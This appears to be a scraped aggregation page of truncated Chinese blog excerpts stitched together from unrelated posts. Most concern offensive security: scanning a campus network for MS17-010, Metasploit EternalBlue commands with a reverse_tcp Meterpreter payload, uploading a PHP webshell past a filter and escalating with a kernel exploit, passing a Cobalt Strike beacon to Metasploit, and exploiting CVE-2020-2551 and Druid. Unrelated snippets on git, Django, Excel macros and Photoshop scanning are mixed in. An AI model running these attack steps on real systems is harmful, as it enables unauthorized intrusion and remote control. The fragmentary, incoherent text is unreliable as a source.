利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_010扫描工具: auxiliary/scanner/smb/smb_ms17_010 使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单. 首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16.实际上经过测试,只需扫描10.31.0…
声明:不会Java. 参考:https://www.secpulse.com/archives/6203.html 下载mjet,https://github.com/mogwaisec/mjet 按照说明中的步骤: Copy the "MBean" folder to "data/java/metasploit" Copy java_mlet_server.rb to "modules/exploits/multi/misc/" 这里有个坑,m…
本文须知 教程所示图片使用的是 github 仓库图片,网速过慢的朋友请移步原文地址 有空就来看看个人技术小站, 我一直都在 背景介绍 事情的起源是这样的:迷恋的谷歌的我最近申请了一个新的 google 邮箱.然后果断在 github 上更新了邮箱地址,并且删除了之前的 163 等国内邮箱. 回到 github 首页,我发现之前的项目提交记录都没了.到底什么情况(O_o)?? 看一张灾难现场图: 仔细查找了相关资料,发现了是因为之前的提交记录中Author字段的信息是 163 等国内邮箱的.如下…
0x00 window 2003 R2 x86 use exploit/windows/smb/ms17_010_eternalblue show options set rhost 192.168.204.133 set lhost 192.168.204.129 set payload windows/meterpreter/reverse_tcp run use exploit/windows/smb/ms17_010_psexec set rhost 192.168.204.133 se…
0x01简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 攻击对象:win7及win7以下的操作系统且开启了445端口smb服务,防火墙关闭状态下且没打补丁 0x02攻击思路 1.先用nmap扫描整个网段开放的端口,再利用msf的扫描模块儿,扫描开放了445端口的主机ip,扫描出存在ms17-010的话就利用msf的攻击模块儿进行反弹shell:如果扫描出不存在该漏洞,就扫描下一条ip. 2.利用工具批量扫描一个网段…
https://www.cnblogs.com/yeungchie/ code procedure(ycInListp(scan keylist) prog((times) times = 0 foreach(key keylist if(scan == key then times++ ) ) if(times > 0 then return(times) else return(nil) ) ) ) describe 扫描keylist中是否含有scan并计数,有则返回计数,否则返回nil.…
利用struts2上传文件时,如果文件名中含有-符号,那么会出错 报错如下: HTTP Status 500 - C:\Program Files\Apache Software Foundation\Tomcat 6.0\work\Catalina\localhost\dqzx\upload_2de065e9_14fd3bcae34__8000_00000101.tmp (系统找不到指定的文件.) type Exception report message C:\Program Files\A…
sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQL注入漏洞进行地毯式的扫描. 1.首先是burp设置记录log,文件名就随便填一个了. 2.把记录的log文件放sqlmap目录下 3.sqlmap读log自动测试: python sqlmap.py -l 文件名 --batch -smart batch:自动选yes. smart:启发式快速判断…
sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQL注入漏洞进行地毯式的扫描. 扫描方式通常有windows扫描与linux扫描两种. 一.Windows下扫描配置 1.配置burpsuite下记录所有的request记录,并保存在指定文件夹. 因为windows下sqlmap工具需要使用python,所以我的sqlmap路径放在了C:\Pytho…
github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPscan这样的重量级扫描器,显然是不合适的. 对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 试试信息泄漏批量扫描脚本 BBScan. BBScan是一个迷你的信息泄漏批量扫描脚本.规则字典非常小,但尽量保证准确和可利用性. 特性: 1. 小字典 2. 可以自动扫描 Target/Mas…
以笔主手头上的Canon LIDE 100为例 先安装好扫描仪驱动程序,可使用自带驱动光盘或驱动精灵等程序完成. 打开Photoshop程序,以CS5为例,找到扫描仪入口: 点开高级模式进行配置,笔主准备扫描的是普通B5版面的笔记本资料,笔记本封面上一般都有标记纸张尺寸,输入到相应设置项中,可减少扫描时间,并自动进行裁剪 关于dpi: 鉴于笔主当前使用的显示器为18.5英寸,1366*768分辨率,计算得出目前应用的像素密度为85ppi(普通显示器像素密度为100ppi左右),因此这里输出分辨率…
一.背景 笔者6月份在慕课网录制视频教程XSS跨站漏洞 加强Web安全,里面需要讲到很多实战案例,在漏洞挖掘案例中分为了手工挖掘.工具挖掘.代码审计三部分内容,手工挖掘篇参考地址为快速找出网站中可能存在的XSS漏洞实践(一)https://segmentfault.com/a/1190000016095198 本文主要记录利用Web安全工具Burp suite进行XSS漏洞挖掘部分,分为了设置代理,漏洞扫描,漏洞验证三个部分,其中permeate渗透测试系统的搭建可以参考第一篇文章. 二.操作概…
Web安全测试中常见逻辑漏洞解析(实战篇) 简要: 越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,导致用户A可以操作其他人的信息.​ 逻辑漏洞挖掘一直是安全测试中“经久不衰”的话题.相比SQL注入.XSS漏洞等传统安全漏洞,现在的攻击者更倾向于利用业务逻辑层的应用安全问题,这类问题往往危害巨大,可能造成了企业的资产损失和名誉受损,…
1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自动选yes.     smart:启发式快速判断,节约时间 中文支持可能存在问题 3.扫描的结果保存在 能注入的在上图csv文件中保存 注入的信息保存在对应的文件夹下的log文件,payload信息如下 来自为知笔记(Wiz)…
对于容器,当容器的各个元素为类类型,且该类类型中含有指针成员时: 如果类类型的析构函数中包含了对指针变量指向内存的释放操作,则在利用clear()函数删除容器所有元素时,会自动调用类的析构函数,自动实现各个元素中指针指向的内存的释放,由此可以省去手工依次释放内存的代码操作: 但是对于容器的erase()操作,该函数不会自动调用类成员的析构函数,因此需要手工释放被擦除元素的内容.切记!…
王家林亲授<DT大数据梦工厂>大数据实战视频 Scala 深入浅出实战经典(1-87讲)完整视频.PPT.代码下载: 百度云盘:http://pan.baidu.com/s/1c0noOt6 腾讯微云:http://url.cn/TnGbdC 360云盘:http://yunpan.cn/cQ4c2UALDjSKy 访问密码 45e2土豆:http://www.tudou.com/programs/view/N9y_okxSJzQ/优酷:http://v.youku.com/v_show/id…
版权声明:本文为博主原创文章,未经博主允许不得转载. 转载请注明本文出自xiaanming的博客(http://blog.csdn.net/xiaanming/article/details/18730223),请尊重他人的辛勤劳动成果,谢谢! 写这篇文章之前,先简单说几句,首先是先恭喜下自己获得了2013年的博客之星称号,很意外也很开心,自己是从2013年开始写博客,那时候也不知道怎么写,我从小就不喜欢写日记,作文什么的,所以刚开始都是贴代码,也没有人看,后面慢慢的,写的文章被推荐博客首页和C…
利用Excel批量高速发送电子邮件,分两步: 1. 准备待发送的数据: a.) 打开Excel,新建Book1.xlsx b.) 填入以下的内容, 第一列:接收人,第二列:邮件标题,第三列:正文,第四列:附件路径 注意:附件路径中能够有中文,可是不能有空格 这里你能够写很多其它内容,每一行作为一封邮件发出. 注意:邮件正文是黑白文本内容,不支持加粗.字体颜色等.(假设你须要支持彩色的邮件,后面将会给出解决的方法) 2. 编写宏发送邮件 a.) Alt + F11 打开宏编辑器,菜单中选:插入->…
批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名,根据需求进行修改 :C:\nmap\nmap-6.46\nmap.exe 为namp的路径,根据需求进行修改 :把1.txt与该扫描脚本放一起 @echo off for /f "delims=." %%i in (1.txt) do C:\nmap\nmap-6.46\nmap.exe…
老男孩教育第五关实战考试题:批量创建10个用户stu01-stu10,并且设置随机8位密码,要求不能用shell的循环(例如:for,while等),只能用linux命令及管道实现. 方法1:[root@oldboy /]# echo stu{01..10}|tr " " "\n"|sed -r 's#(.*)#useradd \1 ; pass=$((RANDOM+10000000)); echo "$pass"|passwd --stdin…
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sche…
bulk_create批量插入数据 models.py文件 class Book(models.Model): title=models.CharField(max_length=32) urls.py文件 from app01 import views urlpatterns = [ url(r'^admin/', admin.site.urls), #首页 url(r'^$', views.home), #访问该url就会往book表中批量插入数据 url(r'^index/', views…
'''题一:判断列表中含有字符串且组成新的列表打印输出知识点:列表.列表的增删改查.for循环.if判断'''#@Author:Dotest软件测试#@QQ:1274057839names = ['Dotest','test','donghao',100,True]#定义空列表:容器:思考:为什么不放在for循环里面定义?str_name = []#for循环for name in names: #if判断:函数:isinstance是判断是否为某类型 if isinstance(name,st…
第一步 Cobalt strike 派生 shell 给 MSF(前提有个beacon shell) 第二步 选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器 第三部 msf msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t…
linux中grep和find的用法区别 本文章详细的介绍了关于在linux中的grep和find两个命令的用法介绍,以及后面总结了它们两年用法区别哦. 先我们来介绍一下关于grep用法和一些小注意事项 使用过程中,使用最多的参数就是 -v ,但是用着并不爽. 比如说,我想查找一个单词“UserService”,但是像”*.svn” 这种文件就不用显示了,我该怎么做呢? 代码如下 复制代码 grep -r "UserService" ./ | grep -v "svn&quo…
SqlServer 利用游标批量更新数据 Intro 游标在有时候会很有用,在更新一部分不多的数据时,可以很方便的更新数据,不需要再写一个小工具来做了,直接写 SQL 就可以了 Sample 下面来看一个实际示例: -- 声明字段变量 DECLARE @RegionCode INT; DECLARE @RegionName NVARCHAR(64); DECLARE @ProvinceId INT; -- 声明游标 DECLARE ProvinceCursor CURSOR FOR( SELEC…
Weblogic CVE-2020-2551漏洞复现 Weblogic IIOP 反序列化 漏洞原理 https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html 漏洞复现 csdn-Weblogic CVE-2020-2551复现 靶机:windows7系统 IP地址:192.168.43.20 攻击机:windows10系统 IP地址:192.168.43.38 工具 e…
实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存储在txt文件中->对TXT中的IP进行批量扫描操作 excel按列提取 参考自:https://www.cnblogs.com/xiao987334176/p/11240086.html excel大概长这样: 使用python xlrd库,打开excel文件,创建一个workbook对象,book对…
最近因为实习的原因,为了减少一部分的工作量,在阿里云服务器上搭建了AWVS扫描器 方便摸鱼 但是发现AWVS貌似没有批量添加的方法,作者只好把整理的URL.txt捏了又捏 手动输入是不可能手动输入的,去查了查网上关于AWVS扫描器API的使用,找到两篇文章: https://blog.csdn.net/wy_97/article/details/106872773 https://blog.csdn.net/sinat_25449961/article/details/82985638 然后花一…
Druid未授权访问实战利用 ​ 最近身边的同学都开始挖src了,而且身边接触到的挖src的网友也是越来越多.作者也是在前几天开始了挖src之路.惊喜又遗憾的是第一次挖src就挖到了一家互联网公司的RCE,可惜因为权重太小补天不收,最后也是交到了cnvd. 随便找一个后台 ​ 发现存在逻辑运算类的验证码,看来是爆破首先无望了. 不管三七二十一,先扫下web目录再说,看看有没有什么意外收获 呦西!发现对方用的是swagger框架和druid管理工具 先来访问下swagger界面,发现并没有预期的暴…